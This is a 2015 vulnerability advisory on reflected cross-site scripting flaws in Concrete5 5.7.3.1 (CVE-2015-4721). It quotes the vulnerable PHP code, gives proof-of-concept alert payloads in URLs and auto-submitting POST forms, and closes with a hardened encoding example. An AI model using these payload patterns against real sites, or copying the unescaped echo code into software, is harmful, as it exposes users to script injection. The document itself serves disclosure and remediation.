concrete5 multiple reflected xss advisory
Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted
Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1
Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4
Summary
Vulnerability class: Cross Site Scripting (XSS)
CVE ID: CVE-2015-4721
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable version: 5.7.3.1 and probably prior versions
Fixed on: 5.7.4
Other references:
https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description
Concrete5 is vulnerable to several reflected Cross Site Scripting (XSS) attacks because certain user input is embedded in the HTML output it generates without being validated or encoded.
Vulnerabilities Details
The following reflected XSS vulnerabilities were identified:
File: /concrete/views/panels/details/page/versions.php (lines 5-14):
<?php foreach($_REQUEST['cvID'] as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&cID=<?php echo $_REQUEST['cID']?>" />
User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:
http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):
public function selectUser($fieldName, $uID = false, $javascriptFunc …
    $selectedUID = 0;
    if (isset($_REQUEST[$fieldName])) {
        $selectedUID = $_REQUEST[$fieldName];
    } else if ($uID > 0) {
        $selectedUID = $uID;
    }
    $html = '';
    $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
    if ($selectedUID > 0) {
        $ui = UserInfo::getByID($selectedUID);
        $html .= $ui->getUserName();
    }
    $html .= '</strong></div>';
    $identifier = new \Concrete\Core\Utility\Service\Identifier();
    $selector = $identifier->getString(32);
    $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
    $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';
User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
File: /concrete/elements/group/search.php (lines 4-20):
$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
div[data-search=groups] form.ccm-search-fields {
    margin-left: 0px !important;
}
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />
User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon
User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
URL: http://[host]/index.php/dashboard/pages/single
User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:
<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
File: /concrete/attributes/select/form.php (lines 55-60):
$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
    foreach($vals as $v) { ?>
<div class="newAttrValue">
<?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
<span class="badge"><?php echo $v?></span>
User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.
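Every issue above has the same root cause: a request value is echoed into an HTML attribute or text node with no output encoding. The following is an added example, not code from the advisory or from the Concrete5 project, showing hardened versions of the versions.php tab/iframe output and the select/form.php badge output. It uses plain htmlspecialchars() and rawurlencode() rather than any Concrete5 helper, and the tools path is a placeholder standing in for REL_DIR_FILES_TOOLS_REQUIRED.

```php
<?php
// Added example (not Concrete5 project code). Requires PHP >= 5.4.

// Encode for an HTML text node or a double/single-quoted attribute value.
function esc_html($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a value for a URL query-string component (the iframe src case).
function esc_url_param($value) {
    return rawurlencode((string) $value);
}

// cID / cvID are numeric identifiers: accept only a positive integer,
// otherwise return null so the caller can drop the value.
function id_or_null($value) {
    if (!is_scalar($value) || !ctype_digit((string) $value) || (int) $value <= 0) {
        return null;
    }
    return (int) $value;
}

function render_version_tabs(array $request) {
    $cID = id_or_null(isset($request['cID']) ? $request['cID'] : null);
    $cvIDs = isset($request['cvID']) ? (array) $request['cvID'] : array();
    $out = '';
    foreach ($cvIDs as $raw) {
        $cvID = id_or_null($raw);
        if ($cID === null || $cvID === null) {
            continue; // malformed IDs are dropped, never reflected
        }
        // '/tools/required' is a placeholder for REL_DIR_FILES_TOOLS_REQUIRED.
        $src = '/tools/required/pages/preview_version?cvID=' . esc_url_param($cvID)
             . '&cID=' . esc_url_param($cID);
        $out .= '<div id="ccm-tab-content-view-version-' . esc_html($cvID) . '">'
              . '<iframe src="' . esc_html($src) . '"></iframe></div>' . "\n";
    }
    return $out;
}

// atSelectNewOption is free text: encode it on output in both the hidden
// input's value attribute and the visible badge.
function render_new_option($v) {
    return '<input type="hidden" name="atSelectNewOption[]" value="' . esc_html($v) . '">'
         . '<span class="badge">' . esc_html($v) . '</span>';
}

// Constructed inputs that reuse the payload shapes from this advisory.
$request = array('cID' => '1', 'cvID' => array('1', '"><script>alert(/XSS/)</script><!--'));
echo render_version_tabs($request);   // only the cvID=1 tab is emitted
echo render_new_option('"><script>alert(/XSS/)</script>'), "\n"; // markup is encoded
```

Use integer validation for values that are identifiers and contextual encoding for values that must carry arbitrary text; encoding alone keeps the cvID payload harmless, but rejecting it also avoids emitting a useless tab.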